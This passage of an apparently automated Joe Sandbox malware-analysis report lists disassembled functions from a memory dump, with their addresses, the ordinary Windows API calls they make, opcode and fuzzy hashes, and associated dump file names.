Opcode Fuzzy Hash: d7ae02658d8dbf108027b98470f96620d3a87810b954c77f7f60046eab91d2d1
Instruction Fuzzy Hash: A92102F0A00604EBDF149F51E844AAABFF9FF46340F22866EE586C1151EB3895E1D71A

Function 0069D805 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0069D837

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
Instruction ID: 04f4f46ff1d506c8c290980017d21dc4ea68678edeb1492b520506b20e343607
Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
Instruction Fuzzy Hash: 18114CB5600601DFDB24DF28D581956BBEAFF49364720847EE98ACB662E732E841CB50

Function 00693F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00693F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00693F90

Part of subcall function 006B4129: __wfsopen.LIBCMT ref: 006B4134

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,006934E2,?,00000001), ref: 00693FCD

Part of subcall function 00693E78: FreeLibrary.KERNEL32(00000000), ref: 00693EAB

Part of subcall function 00694010: _memmove.LIBCMT ref: 0069405A

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 4396e8f3e23915aa70874e0cadc6d7d1fd39e74a577cd8d9fff3fddad76d4498
Instruction ID: 63e4d26ceb66cd7e02b9469a4da5181a0318f3b03a6d56a2db01679154e85c05
Opcode Fuzzy Hash: 4396e8f3e23915aa70874e0cadc6d7d1fd39e74a577cd8d9fff3fddad76d4498
Instruction Fuzzy Hash: EA11E332610219AACF10AF64DC02FAE77AF9F40704F10882DF942E75C2DF749E429B58

Function 0070AB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0070AB36

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 3cec30299dc4d0cd3f336ed85255bd2f3180a4b3fbb6be71165160ba1248b1e7
Instruction ID: 2178ef5e04fa1d7fb51d35b058f2c1dfb9ced5aeac2c9773746ecef5062fe75f
Opcode Fuzzy Hash: 3cec30299dc4d0cd3f336ed85255bd2f3180a4b3fbb6be71165160ba1248b1e7
Instruction Fuzzy Hash: 6D2146B0108201CFEB24EF68C444A5BBBE2BF8A304F15496CE99647362C731EC85CF52

Function 006F10E5 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?), ref: 006F1100

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a88382b4e7169bba3204c263c336ea628e5db9826e49739b9cdc7ca1d72c1139
Instruction ID: 12c96d6643154ee1a64aa95744174fd79d59d4948c4331e4bc6cfd77c282dffd
Opcode Fuzzy Hash: a88382b4e7169bba3204c263c336ea628e5db9826e49739b9cdc7ca1d72c1139
Instruction Fuzzy Hash: 63115136701219DFDB14DF18C4909EA77EAFF4A7A0B05816AFE558F351CB30AD418B91

Function 00694CA0 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00694E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00694CF7

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a176a579305f31107a480e978ee0c3b4157e96d670a0a41bed0f356f73ce06a2
Instruction ID: aa30e9ed7af132258e8dfa0b8b8f81c534cb488c97527f9da3b3ecee17071c74
Opcode Fuzzy Hash: a176a579305f31107a480e978ee0c3b4157e96d670a0a41bed0f356f73ce06a2
Instruction Fuzzy Hash: 99112A35201745DFDB20CF16C880FA6B7EAAF44754F10C51EE59A86E50CB71E846CB60

Function 00694D29 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007045F9

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
Instruction ID: a2d6dd8256a7a207accefb0454b7c2ddc16cedddd40c8339339e4a07908eb313
Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
Instruction Fuzzy Hash: 7E017CB9201502AFD705AB28C991D39F7AAFF86350714825DE529C7B42DB30AC22CBE5

Function 0069CAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0069CB2F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
Instruction ID: f4f5419e8b3f2d2a592bd0b09b86e179830e8c46736e6abdab9b9202252f861b
Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
Instruction Fuzzy Hash: EE01F9B2200701AED7549B78C807AA7BBD9DF487B0F50852EF95ACB6D1EB71E4408B94

Function 006AF2D0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006AF307

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
Instruction ID: 0d7361585c1b07a0c133cfa8fd5b668f1ca3dd4d7bc921a52ef6dab9cc0259fb
Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
Instruction Fuzzy Hash: 9C01DB71104601EBCF607FA8D845A9BBBEB9F83360B10453DF85847651D7319C558BFA

Function 00695116 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(00000000,?,00000000,?,?,?,00695A39,?,?,?,-00000003,00000000,00000000), ref: 0069514E

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 08342f3d1c253d559757f3a3e36a53022e0405437ae10b5a081fa1cba0170981
Instruction ID: 2a0a390ebc41ab56667af82bb540ac256166c8d191580a4a429e26cc0090e54c
Opcode Fuzzy Hash: 08342f3d1c253d559757f3a3e36a53022e0405437ae10b5a081fa1cba0170981
Instruction Fuzzy Hash: 22F09675602A21ABCF225B55D90076AFB6FEF44F61F00822EE55646A50CB719821CBC8

Function 006E95AF Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 006E95C9

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 9af4c64c4f72114f5689492f08f56952fba95f509033e39bc28bb8ee1719b7d0
Instruction ID: 47de42525540ae85f90616d28af64742c6b311ad1b63c5ffb3ceb6e851665592
Opcode Fuzzy Hash: 9af4c64c4f72114f5689492f08f56952fba95f509033e39bc28bb8ee1719b7d0
Instruction Fuzzy Hash: 79E0E5336042146BC320EA68DC05AABB799BF85730F04875ABDA4C72C1DA30DC14C7C5

Function 00693E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,006934E2,?,00000001), ref: 00693E6D

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: bce94b0505f247a062a0a78521bf5fc0a446fd3128993c4c300653cedebb0a65
Instruction ID: 1055d5aaee667eaaab9e9dd0ddd79ede46f22ddc980ae0b59df55caa97da2d00
Opcode Fuzzy Hash: bce94b0505f247a062a0a78521bf5fc0a446fd3128993c4c300653cedebb0a65
Instruction Fuzzy Hash: 70F015B1505761DFCF349F64D494892BBEAAF047193248A2FE1D682B21C7319A44DF00

Function 006D79F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 006D7A11

Part of subcall function 00697E53: _memmove.LIBCMT ref: 00697EB9

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: FolderPath_memmove
String ID:
API String ID: 3334745507-0
Opcode ID: 73f2bd317a7cd69a5fbd872392ca953e5ae9c01def633baebb88acb0bc9b7923
Instruction ID: 5feb5c432bf83bad64e37cba214151c40da18aa03633fe6152719e0f9ab49f84
Opcode Fuzzy Hash: 73f2bd317a7cd69a5fbd872392ca953e5ae9c01def633baebb88acb0bc9b7923
Instruction Fuzzy Hash: 5CD05EA65002282FDFA0E6689C0ADFB36ADC744204F0042A47C6DD2042E924AE458AE4

Function 0069193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00691952

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSendTimeout
String ID:
API String ID: 1599653421-0
Opcode ID: 10417a6204c4d0459932b4d5868c7ace6b9b7cd10cf5927a212d026901031f9c
Instruction ID: eb5e3565038123d1ed65f417b210e985512faff71c0767b064c5a7b12bc086ca
Opcode Fuzzy Hash: 10417a6204c4d0459932b4d5868c7ace6b9b7cd10cf5927a212d026901031f9c
Instruction Fuzzy Hash: C2D0C9B16902087EFB008761CD06DBB776CD721A81F0086617A06D64D1D6649E098574

Function 006CE390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0069193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00691952

SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006CE3AA

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$Timeout
String ID:
API String ID: 1777923405-0
Opcode ID: e5ccaab2b488560f2a7652535026fb03ae9cc2186d6f2a5260f811667bede3a8
Instruction ID: ae02c6ba07800bcd20885b70d1c2e6496bdc1677377f693f2c7c14e87514388f
Opcode Fuzzy Hash: e5ccaab2b488560f2a7652535026fb03ae9cc2186d6f2a5260f811667bede3a8
Instruction Fuzzy Hash: 03D01231144150AAFE706B58FC06FD177A7DB41750F21445DB5856B1E9C6D25C425548

Function 006E6FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?), ref: 006E6FE1

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 8a1128c3e74502a922201e556bfb8c759b592663ad5a5e3be0efe65be7a6e54a
Instruction ID: b20f7c268463c0adf71661895e9fc3560c2b7b228dd5ffbbb254cd68e0180a89
Opcode Fuzzy Hash: 8a1128c3e74502a922201e556bfb8c759b592663ad5a5e3be0efe65be7a6e54a
Instruction Fuzzy Hash: 84D05E362102149F8B00EF98DC04C8577E9FF4D711300C065F509CB230C621FC509B84

Function 00694FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,007049DA,?,?,00000000), ref: 00694FC4

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 63cc7cc6026ce017ed8db0d80acb86f43025c4f226013dda0813d0612b074c2f
Instruction ID: 3253077b9089e01eac71c0a00d9f31d3ff15f67fc58ced0a093b5680fb73e62c
Opcode Fuzzy Hash: 63cc7cc6026ce017ed8db0d80acb86f43025c4f226013dda0813d0612b074c2f
Instruction Fuzzy Hash: AAD0C97465020CBFEB10CB94DC46F9A7BBCEB04718F204194FA00A62D0D2F2BE409B55

Function 00704DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00704DE7

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 07f027d07879057115be3ad9e9d0e47d06209cf298757dbbfe5b3b4aba4d1302
Instruction ID: d927ebcfdaecb9efbe1022467d69041b786fe7e85230746f693d7bd578338440
Opcode Fuzzy Hash: 07f027d07879057115be3ad9e9d0e47d06209cf298757dbbfe5b3b4aba4d1302
Instruction Fuzzy Hash: A0D0C7B15041009BE7706F69E804786B7D5EF45300F14841DE9C682550D7BA9CC29F15

Function 006B4129 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 006B4134

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

